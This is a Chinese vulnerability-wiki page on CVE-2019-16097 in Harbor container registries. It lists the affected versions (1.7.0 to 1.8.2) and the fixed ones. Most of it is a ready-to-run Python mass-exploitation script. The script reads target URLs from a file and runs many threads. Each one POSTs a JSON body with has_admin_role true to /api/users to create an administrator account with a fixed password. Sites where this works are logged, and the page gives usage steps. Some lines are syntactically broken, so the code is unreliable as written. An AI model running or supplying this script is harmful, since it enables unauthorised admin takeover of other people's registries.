免费、自由、人人可编辑的漏洞库
,
影响版本
Harbor 1.7.0版本至1.8.2版本
不受影响版本
Harbor>= 1.7.6
Harbor>= 1.8.3
批量利用POC
import requests
import threading
import logging
data='{"username":"biubiubiu","email":"email protected","realname":"biubiu1biu","password":"Aa111111","comment":"biubiubiu","has_admin_role":true}'
headers={"Content-Type": "application/json"}
def poc(url):
pwn_url=url+"/api/users"
payload=data
try:
r=requests.post(pwn_url, data=payload,headers=headers,timeout=10)
print(pwn_url)
print(r.status_code)
if r.status_code == 201:
print("\n\n you has created a user,username=biubiubiu,password=Aa111111")
f.write(url+" The URL has created a user,username=biubiubiu,password=Aa111111")
else:
print("The vulnerability does not exist on the website or the account name has been written")
except Exception as e:
logging.warning(pwn_url)
print(e)
if __name__ == '__main__':
print ("this is a CVE-2019-16097 poc")
print("more cve-2019-16097 info welcome to https://www.lstazl.com")
f=open("results.txt","a")
url_list=i.replace("\n","") for i in open("urls.txt","r").readlines()
for url in url_list:
threading.Thread(target=poc,args=(url,)).start()
while 1:
if (len(threading.enumerate())<50):
break
1.在urls.txt中添加你要检测的url
2.python3环境下运行cve-2019-16097脚本 python3 cve-2019-16097.py
3.批量检测完成后再results中查看成功写入账号的url。
PWNWIK.COM
